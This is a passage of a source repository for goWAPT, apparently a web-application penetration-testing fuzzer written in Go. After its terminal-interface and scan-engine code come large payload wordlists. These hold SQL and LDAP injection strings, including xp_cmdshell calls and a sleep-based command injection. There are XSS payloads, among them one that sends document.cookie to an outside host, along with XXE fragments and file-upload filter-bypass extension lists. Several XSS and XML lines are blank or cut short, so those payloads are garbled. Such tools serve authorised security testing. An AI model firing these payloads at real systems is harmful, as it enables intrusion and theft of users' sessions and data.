callbackMethod(infoBack)) 59 | } 60 | 61 | func infoMenu() { 62 | infoInitHotkeys() 63 | infoInitTerminal() 64 | loop: 65 | for { 66 | event := termbox.PollEvent() 67 | ret := infoHandleEvents(event) 68 | if ret != nil { 69 | break loop 70 | } 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /src/mainmenu.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "github.com/nsf/termbox-go" 5 | ) 6 | 7 | func handleEvents(ev termbox.Event, cfg Configuration) { 8 | switch ev.Type { 9 | case termbox.EventError: 10 | panic(ev.Err) 11 | case termbox.EventKey: 12 | if haveCallbackDefined("main", int(ev.Ch)) { 13 | termbox.Clear(termbox.ColorDefault, termbox.ColorDefault) 14 | checkCallback("main", int(ev.Ch)) 15 | initTerminal(cfg) 16 | termbox.Flush() 17 | } 18 | case termbox.EventResize: 19 | initTerminal(cfg) 20 | default: 21 | initTerminal(cfg) 22 | } 23 | } 24 | 25 | func initTerminal(cfg Configuration) { 26 | termbox.Clear(termbox.ColorDefault, termbox.ColorDefault) 27 | if _, _, correctSize := checkSize(); correctSize { 28 | drawCenterHorizontal(2, termbox.ColorDefault, "^1CONFIGURATION") 29 | 30 | drawMultiColor(1, 5, "^4URL ^6: ^7%s", termbox.ColorDefault, formatConfigOption(cfg.url)) 31 | drawMultiColor(1, 6, "^4SSL ^6: ^7%v", termbox.ColorDefault, cfg.ssl) 32 | drawMultiColor(1, 7, "^4Cookies ^6: ^7%v", termbox.ColorDefault, formatConfigOption(cfg.cookies)) 33 | drawMultiColor(1, 8, "^4Encoders ^6: ^7%v", termbox.ColorDefault, cfg.encoders) 34 | drawMultiColor(1, 9, "^4Post Data ^6: ^7%v", termbox.ColorDefault, formatConfigOption(cfg.postdata)) 35 | drawMultiColor(1, 10, "^4Template ^6: ^7%v", termbox.ColorDefault, formatConfigOption(cfg.template)) 36 | drawMultiColor(1, 11, "^4Wordlist ^6: ^7%v", termbox.ColorDefault, formatConfigOption(cfg.wordlist)) 37 | drawMultiColor(1, 12, "^4Use fuzzer ^6: ^7%v", termbox.ColorDefault, cfg.usefuzzer) 38 | drawMultiColor(1, 13, "^4Threads ^6: ^7%v", termbox.ColorDefault, cfg.threads) 39 | drawMultiColor(1, 14, "^4Filter ^6: ^7%v", termbox.ColorDefault, formatConfigOption(cfg.filter)) 40 | drawHeader("^7Go Web Application Penetration Test made with ^1❤ ^7by DZONERZY") 41 | drawFooter("^7[^1Q^7] Quit ^7[^1S^7] Start Attack ^7[^1I^7] Info") 42 | } else { 43 | drawCenterAlign(termbox.ColorRed, termbox.ColorDefault, "Please resize screen") 44 | } 45 | termbox.Flush() 46 | } 47 | 48 | func quit(int) interface{} { 49 | cleanAndExit() 50 | return nil 51 | } 52 | 53 | func info(int) interface{} { 54 | infoMenu() 55 | return nil 56 | } 57 | 58 | func startFuzz(int) interface{} { 59 | started = true 60 | go startFuzzEngine(&config, &results) 61 | fuzzMenu() 62 | return nil 63 | } 64 | 65 | func initHotkeys() { 66 | addCallbackMenu("main", int('q'), callbackMethod(quit)) 67 | addCallbackMenu("main", int('Q'), callbackMethod(quit)) 68 | addCallbackMenu("main", int('i'), callbackMethod(info)) 69 | addCallbackMenu("main", int('I'), callbackMethod(info)) 70 | addCallbackMenu("main", int('S'), callbackMethod(startFuzz)) 71 | addCallbackMenu("main", int('s'), callbackMethod(startFuzz)) 72 | } 73 | 74 | func mainMenu(cfg Configuration) { 75 | initHotkeys() 76 | initPrints() 77 | initTerminal(cfg) 78 | for { 79 | event := termbox.PollEvent() 80 | handleEvents(event, cfg) 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /src/scanengine.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "net/http" 5 | ) 6 | 7 | var stopScannerEngine chan bool 8 | var stopScanEngine chan bool 9 | var endScanDispose chan bool 10 | var stopPlugin chan bool 11 | var scanFinishedChan chan bool 12 | var scanStopPlugin chan bool 13 | var testChannel chan []TestResult 14 | var scanStoppedViaStop bool = false 15 | var scanEndDispose chan bool 16 | 17 | func startScanEngine(base_request *http.Request, plugins *[]ScannerPlugin) { 18 | stopScannerEngine = make(chan bool) 19 | stopScanEngine = make(chan bool) 20 | go runScanEngine(base_request, plugins) 21 | for { 22 | select { 23 | case res := <-stopScannerEngine: 24 | if res == true { 25 | stopScanEngine <- true 26 | return 27 | } 28 | } 29 | } 30 | } 31 | 32 | func scanDispose(res *[]TestResult, ch chan []TestResult, until int, finish chan bool, end chan bool) { 33 | for i := 1; i <= until; i++ { 34 | select { 35 | case r := <-ch: 36 | percentage = (100 * i) / until 37 | for _, element := range r { 38 | *res = append(*res, element) 39 | videoUpdateChan <- true 40 | } 41 | videoUpdateChan <- true 42 | case k := <-end: 43 | if k == true { 44 | finish <- true 45 | return 46 | } 47 | } 48 | } 49 | finish <- true 50 | return 51 | } 52 | 53 | func scanWaitTillEnd(finished chan bool) { 54 | endLoop: 55 | for { 56 | select { 57 | case r := <-finished: 58 | if r == true { 59 | break endLoop 60 | } 61 | } 62 | } 63 | } 64 | 65 | func doPlugin(ch chan []TestResult, stopch chan bool, base_request *http.Request, plugin ScannerPlugin) { 66 | var done bool = false 67 | for !done { 68 | select { 69 | case s := <-stopch: 70 | if s == true { 71 | return 72 | } 73 | default: 74 | r := plugin.entryPoint(base_request) 75 | val, _ := r.Export() 76 | switch v := val.(type) { 77 | case []TestResult: 78 | ch <- v 79 | default: 80 | ch <- []TestResult{} 81 | } 82 | done = true 83 | } 84 | } 85 | } 86 | 87 | func runScanEngine(base_request *http.Request, plugins *[]ScannerPlugin) { 88 | testChannel = make(chan []TestResult) 89 | scanFinishedChan = make(chan bool) 90 | scanStopPlugin = make(chan bool) 91 | scanEndDispose = make(chan bool) 92 | videoUpdateChan = make(chan bool) 93 | max := len(*plugins) 94 | go scanDispose(&ScannerResults, testChannel, max, scanFinishedChan, scanEndDispose) 95 | scanEngineLoop: 96 | for _, plugin := range *plugins { 97 | select { 98 | case r := <-stopEngine: 99 | if r == true { 100 | scanStoppedViaStop = true 101 | scanEndDispose <- true 102 | break scanEngineLoop 103 | } 104 | default: 105 | r := plugin.entryPoint(base_request) 106 | val, _ := r.Export() 107 | switch v := val.(type) { 108 | case []TestResult: 109 | testChannel <- v 110 | default: 111 | testChannel <- []TestResult{} 112 | } 113 | } 114 | } 115 | scanWaitTillEnd(scanFinishedChan) 116 | if !scanStoppedViaStop { 117 | stopScannerEngine <- true 118 | } 119 | started = false 120 | percentage = (100 * max) / max 121 | videoUpdateChan <- true 122 | return 123 | } 124 | -------------------------------------------------------------------------------- /src/utils.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "io/ioutil" 5 | "net/http" 6 | "net/http/httputil" 7 | "os" 8 | "strconv" 9 | "strings" 10 | 11 | "github.com/nsf/termbox-go" 12 | ) 13 | 14 | func checkSize() (int, int, bool) { 15 | width, height := termbox.Size() 16 | if (width < 105) || (height < 23) { 17 | return width, height, false 18 | } 19 | return width, height, true 20 | } 21 | 22 | func cleanAndExit() { 23 | termbox.Clear(termbox.ColorDefault, termbox.ColorDefault) 24 | termbox.Close() 25 | os.Exit(0) 26 | } 27 | 28 | type callbackMethod func(int) interface{} 29 | 30 | type Callback struct { 31 | cmd int 32 | action callbackMethod 33 | } 34 | 35 | var callbacks = map[string][]Callback{} 36 | 37 | func addCallbackMenu(menuName string, charcmd int, callback callbackMethod) { 38 | callbacks[menuName] = append(callbacks[menuName], Callback{cmd: charcmd, action: callback}) 39 | } 40 | 41 | func haveCallbackDefined(menuName string, charcmd int) bool { 42 | for _, callback := range callbacks[menuName] { 43 | if callback.cmd == charcmd || callback.cmd == CALLBACK_EVERY_KEY { 44 | return true 45 | } 46 | } 47 | return false 48 | } 49 | 50 | func checkCallback(menuName string, cmd int) interface{} { 51 | for _, callback := range callbacks[menuName] { 52 | if callback.cmd == cmd || callback.cmd == CALLBACK_EVERY_KEY { 53 | return callback.action(cmd) 54 | } 55 | } 56 | return nil 57 | } 58 | 59 | func formatConfigOption(s string) string { 60 | if s == "" { 61 | return "" 62 | } else { 63 | return s 64 | } 65 | } 66 | 67 | func resetCallbacks(menuName string) { 68 | callbacks[menuName] = []Callback{} 69 | } 70 | 71 | func splitToFill(s string, n int) []string { 72 | var pieces []string 73 | var tmp string 74 | var count int = 0 75 | for _, element := range s { 76 | count++ 77 | tmp += string(element) 78 | if strings.Contains(tmp, "\n") { 79 | count = 0 80 | pieces = append(pieces, tmp) 81 | tmp = "" 82 | } 83 | if count == n { 84 | count = 0 85 | pieces = append(pieces, tmp) 86 | tmp = "" 87 | } 88 | } 89 | pieces = append(pieces, tmp) 90 | return pieces 91 | } 92 | 93 | func response2String(response *http.Response) []byte { 94 | var reqBodyBytes []byte 95 | respBodyBytes, _ := ioutil.ReadAll(response.Body) 96 | cl, _ := strconv.Atoi(response.Request.Header.Get("Content-Length")) 97 | if cl > 0 { 98 | reqBodyBytes, _ = ioutil.ReadAll(response.Request.Body) 99 | } else { 100 | reqBodyBytes = []byte{} 101 | } 102 | s_req, _ := httputil.DumpRequest(response.Request, true) 103 | s_res, _ := httputil.DumpResponse(response, false) 104 | var full []byte 105 | full = append(full, s_req...) 106 | full = append(full, reqBodyBytes...) 107 | full = append(full, []byte{0x0a, 0x0a, 0x0a}...) 108 | full = append(full, s_res...) 109 | full = append(full, respBodyBytes...) 110 | return full 111 | } 112 | -------------------------------------------------------------------------------- /wordlist/Injections/SQL.txt: -------------------------------------------------------------------------------- 1 | ' 2 | " 3 | # 4 | - 5 | -- 6 | '%20-- 7 | --'; 8 | '%20; 9 | =%20' 10 | =%20; 11 | =%20-- 12 | \x23 13 | \x27 14 | \x3D%20\x3B' 15 | \x3D%20\x27 16 | \x27\x4F\x52 SELECT * 17 | \x27\x6F\x72 SELECT * 18 | 'or%20select * 19 | admin'-- 20 | <>"'%;)(&+ 21 | '%20or%20''=' 22 | '%20or%20'x'='x 23 | "%20or%20"x"="x 24 | ')%20or%20('x'='x 25 | 0 or 1=1 26 | ' or 0=0 -- 27 | " or 0=0 -- 28 | or 0=0 -- 29 | ' or 0=0 # 30 | " or 0=0 # 31 | or 0=0 # 32 | ' or 1=1-- 33 | " or 1=1-- 34 | ' or '1'='1'-- 35 | "' or 1 --'" 36 | or 1=1-- 37 | or%201=1 38 | or%201=1 -- 39 | ' or 1=1 or ''=' 40 | " or 1=1 or ""=" 41 | ' or a=a-- 42 | " or "a"="a 43 | ') or ('a'='a 44 | ") or ("a"="a 45 | hi" or "a"="a 46 | hi" or 1=1 -- 47 | hi' or 1=1 -- 48 | hi' or 'a'='a 49 | hi') or ('a'='a 50 | hi") or ("a"="a 51 | 'hi' or 'x'='x'; 52 | @variable 53 | ,@variable 54 | PRINT 55 | PRINT @@variable 56 | select 57 | insert 58 | as 59 | or 60 | procedure 61 | limit 62 | order by 63 | asc 64 | desc 65 | delete 66 | update 67 | distinct 68 | having 69 | truncate 70 | replace 71 | like 72 | handler 73 | bfilename 74 | ' or username like '% 75 | ' or uname like '% 76 | ' or userid like '% 77 | ' or uid like '% 78 | ' or user like '% 79 | exec xp 80 | exec sp 81 | '; exec master..xp_cmdshell 82 | '; exec xp_regread 83 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 84 | --sp_password 85 | \x27UNION SELECT 86 | ' UNION SELECT 87 | ' UNION ALL SELECT 88 | ' or (EXISTS) 89 | ' (select top 1 90 | '||UTL_HTTP.REQUEST 91 | 1;SELECT%20* 92 | to_timestamp_tz 93 | tz_offset 94 | <>"'%;)(&+ 95 | '%20or%201=1 96 | %27%20or%201=1 97 | %20$(sleep%2050) 98 | %20'sleep%2050' 99 | char%4039%41%2b%40SELECT 100 | '%20OR 101 | 'sqlattempt1 102 | (sqlattempt2) 103 | | 104 | %7C 105 | *| 106 | %2A%7C 107 | *(|(mail=*)) 108 | %2A%28%7C%28mail%3D%2A%29%29 109 | *(|(objectclass=*)) 110 | %2A%28%7C%28objectclass%3D%2A%29%29 111 | ( 112 | %28 113 | ) 114 | %29 115 | & 116 | %26 117 | ! 118 | %21 119 | ' or 1=1 or ''=' 120 | ' or ''=' 121 | x' or 1=1 or 'x'='y 122 | / 123 | // 124 | //* 125 | */* 126 | -------------------------------------------------------------------------------- /wordlist/Injections/XML.txt: -------------------------------------------------------------------------------- 1 | count(/child::node()) 2 | x' or name()='username' or 'x'='y 3 | ','')); phpinfo(); exit;/* 4 | var n=0;while(true){n++;}]]> 5 | SCRIPT]]>alert('XSS');/SCRIPT]]> 6 | SCRIPT]]>alert('XSS');/SCRIPT]]> 7 | 8 | ]>&xxe; 9 | ]>&xxe; 10 | ]>&xxe; 11 | ]>&xxe; 12 | ]]> 13 | <IMG SRC="javascript:alert('XSS')"> 14 | 15 | XSS 16 | -------------------------------------------------------------------------------- /wordlist/Injections/XSS.txt: -------------------------------------------------------------------------------- 1 | "> 3 | < 4 | 5 | '> 6 | '> 7 | \";alert('XSS');// 8 | %3cscript%3ealert("WXSS");%3c/script%3e 9 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e 10 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E 11 | <script>alert(document.cookie); 12 | <script>alert(document.cookie);<script>alert 13 | 14 | 15 | 16 | 18 | 19 | 20 | 21 | "> 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E 36 | "> 37 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E 38 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} 39 | '';!--"=&{()} 40 | -------------------------------------------------------------------------------- /wordlist/Injections/bad_chars.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/Injections/bad_chars.txt -------------------------------------------------------------------------------- /wordlist/attack/all-attacks/all-attacks-xplatform.txt: -------------------------------------------------------------------------------- 1 | !' 2 | !@#$%%^#$%#$@#$%$$@#$%^^**(() 3 | !@#0%^#0##018387@#0^^**(() 4 | "><"test@address.com 24 | a"b(c)d,e:f;gi[j\k]l@example.com 25 | this is"not\allowed@example.com 26 | notallowed@example.com 27 | notallowed@example.com 28 | -------------------------------------------------------------------------------- /wordlist/attack/email/valid-email-addresses.txt: -------------------------------------------------------------------------------- 1 | email@eaddress.com 2 | firstname.lastname@address.com 3 | email@subdomain.address.com 4 | firstname+lastname@address.com 5 | name@129.129.129.129 6 | name@[129.129.129.129] 7 | 0123456789@address.com 8 | email@address-one.com 9 | email@address.name 10 | email@address.co.jp 11 | firstname-lastname@address.com 12 | much."more\ unusual"@address.com 13 | very.unusual."@".unusual.com@address.com 14 | very."(),:;<>[]".VERY."very@\\ "very".unusual@strange.address.com 15 | abcdefghijklmnopqrstuvwxyz!#$%&'*+-/=?^_`{|}~.0123456789@abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.com 16 | {jacco'vantuijl}@address.server 17 | "Jacco\@test"@address.com 18 | "Jacco van Tuijl"@address.com 19 | "Jacco\\test"@address.com 20 | "Jacco@test"@address.com 21 | Jacco/van=Tuijl@address.com 22 | \$A12345@address.com 23 | !def!abc%dfg@address.com 24 | _jacco@address.com 25 | a.long.email.address.test@dept.address.com 26 | "jacco.vantuijl.@.address.com"@address.com 27 | jacco@mailserver1 28 | #!$%&'*+-/=?^_`{}|~@address.org 29 | "()<>[]:,;@\\\"!#$%&'*+-/=?^_`{}| ~.a"@address.org 30 | " "@address.org 31 | üñîçøðé@address.com 32 | address@üñîçøðé.com 33 | üñîçøðé@üñîçøðé.com -------------------------------------------------------------------------------- /wordlist/attack/file-upload/alt-extensions-asp.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | asa 4 | aSP 5 | aSpx 6 | aSa 7 | asp%20%20%20 8 | aspx%20%20%20 9 | asa%20%20%20 10 | aSP%20%20%20 11 | aSpx%20%20%20 12 | aSa%20%20%20 13 | asp...... 14 | aspx...... 15 | asa...... 16 | aSP...... 17 | aSpx...... 18 | aSa...... 19 | asp%20%20%20...%20.%20.. 20 | aspx%20%20%20...%20.%20.. 21 | asa%20%20%20...%20.%20.. 22 | aSP%20%20%20...%20.%20.. 23 | aSpx%20%20%20...%20.%20.. 24 | aSa%20%20%20...%20.%20.. 25 | asp%00 26 | aspx%00 27 | asa%00 28 | aSp%00 29 | aSpx%00 30 | aSa%00 31 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/alt-extensions-coldfusion.txt: -------------------------------------------------------------------------------- 1 | cfm 2 | cfml 3 | cfc 4 | dbm 5 | cFm 6 | cFml 7 | cFc 8 | dBm 9 | cfm%20%20%20 10 | cfml%20%20%20 11 | cfc%20%20%20 12 | dbm%20%20%20 13 | cFm%20%20%20 14 | cFml%20%20%20 15 | cFc%20%20%20 16 | dBm%20%20%20 17 | cfm...... 18 | cfml...... 19 | cfc....... 20 | dbm...... 21 | cFm...... 22 | cFml...... 23 | cFc...... 24 | dBm...... 25 | cfm%20%20%20...%20.%20.. 26 | cfml%20%20%20...%20.%20.. 27 | cfc%20%20%20...%20.%20.. 28 | dbm%20%20%20...%20.%20.. 29 | cFm%20%20%20...%20.%20.. 30 | cFml%20%20%20...%20.%20.. 31 | cFc%20%20%20...%20.%20.. 32 | dBm%20%20%20...%20.%20.. 33 | cfm%00 34 | cfml%00 35 | cfc%00 36 | dbm%00 37 | cFm%00 38 | cFml%00 39 | cFc%00 40 | dBm%00 41 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/alt-extensions-jsp.txt: -------------------------------------------------------------------------------- 1 | jsp 2 | jspx 3 | jsw 4 | jsv 5 | jspf 6 | jSp 7 | jSpx 8 | jSw 9 | jSv 10 | jSpf 11 | jSp%00 12 | jSp%20%20%20 13 | jSp%20%20%20...%20.%20..a 14 | jSp...... 15 | jSpf%00 16 | jSpf%20%20%20 17 | jSpf%20%20%20...%20.%20..a 18 | jSpf...... 19 | jSpx%00 20 | jSpx%20%20%20 21 | jSpx%20%20%20...%20.%20..a 22 | jSpx...... 23 | jSv%00 24 | jSv%20%20%20 25 | jSv%20%20%20...%20.%20..a 26 | jSv...... 27 | jSw%00 28 | jSw%20%20%20 29 | jSw%20%20%20...%20.%20..a 30 | jSw...... 31 | jsp%00 32 | jsp%20%20%20 33 | jsp%20%20%20...%20.%20..a 34 | jsp...... 35 | jspf%00 36 | jspf%20%20%20 37 | jspf%20%20%20...%20.%20..a 38 | jspf...... 39 | jspx%00 40 | jspx%20%20%20 41 | jspx%20%20%20...%20.%20..a 42 | jspx...... 43 | jsv%00 44 | jsv%20%20%20 45 | jsv%20%20%20...%20.%20..a 46 | jsv...... 47 | jsw%00 48 | jsw%20%20%20 49 | jsw%20%20%20...%20.%20..a 50 | jsw...... 51 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/alt-extensions-perl.txt: -------------------------------------------------------------------------------- 1 | # .pm .lib cannot be called directly, must be called as modules 2 | pl 3 | pm 4 | cgi 5 | pL 6 | pM 7 | cGi 8 | lib 9 | lIb 10 | cGi%00 11 | cGi%20%20%20 12 | cGi...... 13 | cgi%00 14 | cgi%20%20%20 15 | cgi...... 16 | lIb%00 17 | lIb%20%20%20 18 | lIb...... 19 | lib%00 20 | lib%20%20%20 21 | lib...... 22 | pL%00 23 | pL%20%20%20 24 | pL...... 25 | pM%00 26 | pM%20%20%20 27 | pM...... 28 | pl%00 29 | pl%20%20%20 30 | pl...... 31 | pm%00 32 | pm%20%20%20 33 | pm...... 34 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/alt-extensions-php.txt: -------------------------------------------------------------------------------- 1 | phtml 2 | php 3 | php3 4 | php4 5 | php5 6 | inc 7 | pHtml 8 | pHp 9 | pHp3 10 | pHp4 11 | pHp5 12 | iNc 13 | iNc%00 14 | iNc%20%20%20 15 | iNc%20%20%20...%20.%20.. 16 | iNc...... 17 | inc%00 18 | inc%20%20%20 19 | inc%20%20%20...%20.%20.. 20 | inc...... 21 | pHp%00 22 | pHp%20%20%20 23 | pHp%20%20%20...%20.%20.. 24 | pHp...... 25 | pHp3%00 26 | pHp3%20%20%20 27 | pHp3%20%20%20...%20.%20.. 28 | pHp3...... 29 | pHp4%00 30 | pHp4%20%20%20 31 | pHp4%20%20%20...%20.%20.. 32 | pHp4...... 33 | pHp5%00 34 | pHp5%20%20%20 35 | pHp5%20%20%20...%20.%20.. 36 | pHp5...... 37 | pHtml%00 38 | pHtml%20%20%20 39 | pHtml%20%20%20...%20.%20.. 40 | pHtml...... 41 | php%00 42 | php%20%20%20 43 | php%20%20%20...%20.%20.. 44 | php...... 45 | php3%00 46 | php3%20%20%20 47 | php3%20%20%20...%20.%20.. 48 | php3...... 49 | php4%00 50 | php4%20%20%20 51 | php4%20%20%20...%20.%20.. 52 | php4...... 53 | php5%00 54 | php5%20%20%20 55 | php5%20%20%20...%20.%20.. 56 | php5...... 57 | phtml%00 58 | phtml%20%20%20 59 | phtml%20%20%20...%20.%20.. 60 | phtml...... 61 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt: -------------------------------------------------------------------------------- 1 | templates_compiled 2 | templates_c 3 | templates 4 | temporary 5 | images 6 | cache 7 | temp 8 | files 9 | tmp 10 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt: -------------------------------------------------------------------------------- 1 | {ASPSCRIPT} 2 | {ASPSCRIPT}.{EXT} 3 | {ASPSCRIPT}; 4 | {ASPSCRIPT};.{EXT} 5 | {ASPSCRIPT}%00 6 | {ASPSCRIPT}%00.{EXT} 7 | {ASPSCRIPT}::data%00. 8 | {ASPSCRIPT}::data%00.{EXT} 9 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt: -------------------------------------------------------------------------------- 1 | {ASPSCRIPT} 2 | {ASPSCRIPT}; 3 | {ASPSCRIPT};.jpg 4 | {ASPSCRIPT};.pdf 5 | {ASPSCRIPT};.html 6 | {ASPSCRIPT};.htm 7 | {ASPSCRIPT};.txt 8 | {ASPSCRIPT};.xyz 9 | {ASPSCRIPT};.zip 10 | {ASPSCRIPT};.tgz 11 | {ASPSCRIPT};.doc 12 | {ASPSCRIPT};.docx 13 | {ASPSCRIPT};.xls 14 | {ASPSCRIPT};.xlsx 15 | {ASPSCRIPT}%00.jpg 16 | {ASPSCRIPT}%00.pdf 17 | {ASPSCRIPT}%00.html 18 | {ASPSCRIPT}%00.txt 19 | {ASPSCRIPT}%00.xyz 20 | {ASPSCRIPT}%00.tgz 21 | {ASPSCRIPT}%00.zip 22 | {ASPSCRIPT}%00.doc 23 | {ASPSCRIPT}%00.docx 24 | {ASPSCRIPT}%00 25 | {ASPSCRIPT}::data%00.jpg 26 | {ASPSCRIPT}::data%00.pdf 27 | {ASPSCRIPT}::data%00.html 28 | {ASPSCRIPT}::data%00.txt 29 | {ASPSCRIPT}::data%00.zip 30 | {ASPSCRIPT}::data%00.doc 31 | {ASPSCRIPT}::data%00.xls 32 | {ASPSCRIPT}%00%20%20%20 33 | {ASPSCRIPT}%00%20%20%20...%20.%20.. 34 | {ASPSCRIPT}%00...... 35 | {ASPSCRIPT}%20%20%20 36 | {ASPSCRIPT}%20%20%20...%20.%20.. 37 | {ASPSCRIPT}...... 38 | {ASPSCRIPT}::data%00%%20%20%20 39 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20.. 40 | {ASPSCRIPT}::data%00%...... 41 | {ASPSCRIPT}%00%20%20%20;.jpg 42 | {ASPSCRIPT}%00%20%20%20;.doc 43 | {ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg 44 | {ASPSCRIPT}%00%20%20%20...%20.%20..;.doc 45 | {ASPSCRIPT}%00......;.jpg 46 | {ASPSCRIPT}%00......;.doc 47 | {ASPSCRIPT}%20%20%20;.jpg 48 | {ASPSCRIPT}%20%20%20;.doc 49 | {ASPSCRIPT}%20%20%20...%20.%20..;.jpg 50 | {ASPSCRIPT}%20%20%20...%20.%20..;.doc 51 | {ASPSCRIPT}......;.jpg 52 | {ASPSCRIPT}......;.doc 53 | {ASPSCRIPT}::data%00%%20%20%20;.jpg 54 | {ASPSCRIPT}::data%00%%20%20%20;.doc 55 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg 56 | {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc 57 | {ASPSCRIPT}::data%00%......;.jpg 58 | {ASPSCRIPT}::data%00%......;.doc 59 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-ms-php.txt: -------------------------------------------------------------------------------- 1 | {PHPSCRIPT} 2 | {PHPSCRIPT}.phtml 3 | {PHPSCRIPT}.php.html 4 | {PHPSCRIPT}.php::$DATA 5 | {PHPSCRIPT}.php.php.rar 6 | {PHPSCRIPT}.php.rar 7 | {PHPSCRIPT}::$DATA 8 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt: -------------------------------------------------------------------------------- 1 | %00index.html 2 | ;index.html 3 | %00 4 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt: -------------------------------------------------------------------------------- 1 | {PHPSCRIPT} 2 | {PHPSCRIPT}.phtml 3 | {PHPSCRIPT}.php.html 4 | {PHPSCRIPT}.php.php.rar 5 | {PHPSCRIPT}.php.rar 6 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/invalid-filenames-linux.txt: -------------------------------------------------------------------------------- 1 | / 2 | 3 | \0 4 | /dev/null 5 | /dev/null/foo 6 | . 7 | .. -------------------------------------------------------------------------------- /wordlist/attack/file-upload/invalid-filenames-microsoft.txt: -------------------------------------------------------------------------------- 1 | A: 2 | ZZ: 3 | CON 4 | PRN 5 | AUX 6 | CLOCK$ 7 | NUL 8 | COM1 9 | COM2 10 | COM3 11 | COM4 12 | COM5 13 | COM6 14 | COM7 15 | COM8 16 | COM9 17 | LPT1 18 | LPT2 19 | LPT3 20 | LPT4 21 | LPT5 22 | LPT6 23 | LPT7 24 | LPT8 25 | LPT9 26 | * 27 | " 28 | [ 29 | ] 30 | : 31 | | 32 | = 33 | , 34 | CON.{EXT} 35 | PRN.{EXT} 36 | AUX.{EXT} 37 | CLOCK$.{EXT} 38 | NUL.{EXT} 39 | COM1.{EXT} 40 | COM2.{EXT} 41 | COM3.{EXT} 42 | COM4.{EXT} 43 | COM5.{EXT} 44 | COM6.{EXT} 45 | COM7.{EXT} 46 | COM8.{EXT} 47 | COM9.{EXT} 48 | LPT1.{EXT} 49 | LPT2.{EXT} 50 | LPT3.{EXT} 51 | LPT4.{EXT} 52 | LPT5.{EXT} 53 | LPT6.{EXT} 54 | LPT7.{EXT} 55 | LPT8.{EXT} 56 | LPT9.{EXT} 57 | *.{EXT} 58 | ".{EXT} 59 | [.{EXT} 60 | ].{EXT} 61 | :.{EXT} 62 | |.{EXT} 63 | =.{EXT} 64 | ,.{EXT} 65 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/invalid-filesystem-chars-microsoft.txt: -------------------------------------------------------------------------------- 1 | * 2 | . 3 | " 4 | / 5 | \ 6 | [ 7 | ] 8 | : 9 | ; 10 | | 11 | = 12 | , 13 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/invalid-filesystem-chars-osx.txt: -------------------------------------------------------------------------------- 1 | # list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. 2 | # fuzz these into a filename during upload attempts 3 | : 4 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/POC_img_phpinfo-CR.gif: -------------------------------------------------------------------------------- 1 | GIF89a1 2 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/POC_img_phpinfo-LF-CR.gif: -------------------------------------------------------------------------------- 1 | GIF89a1 2 | 3 | -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/file-upload/malicious-images/POC_phpinfo-metadata.gif -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/file-upload/malicious-images/POC_phpinfo-metadata.jpg -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/eicar.com.txt: -------------------------------------------------------------------------------- 1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/lottapixel.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/attack/file-upload/malicious-images/lottapixel.jpg -------------------------------------------------------------------------------- /wordlist/attack/file-upload/malicious-images/uber.gif: -------------------------------------------------------------------------------- 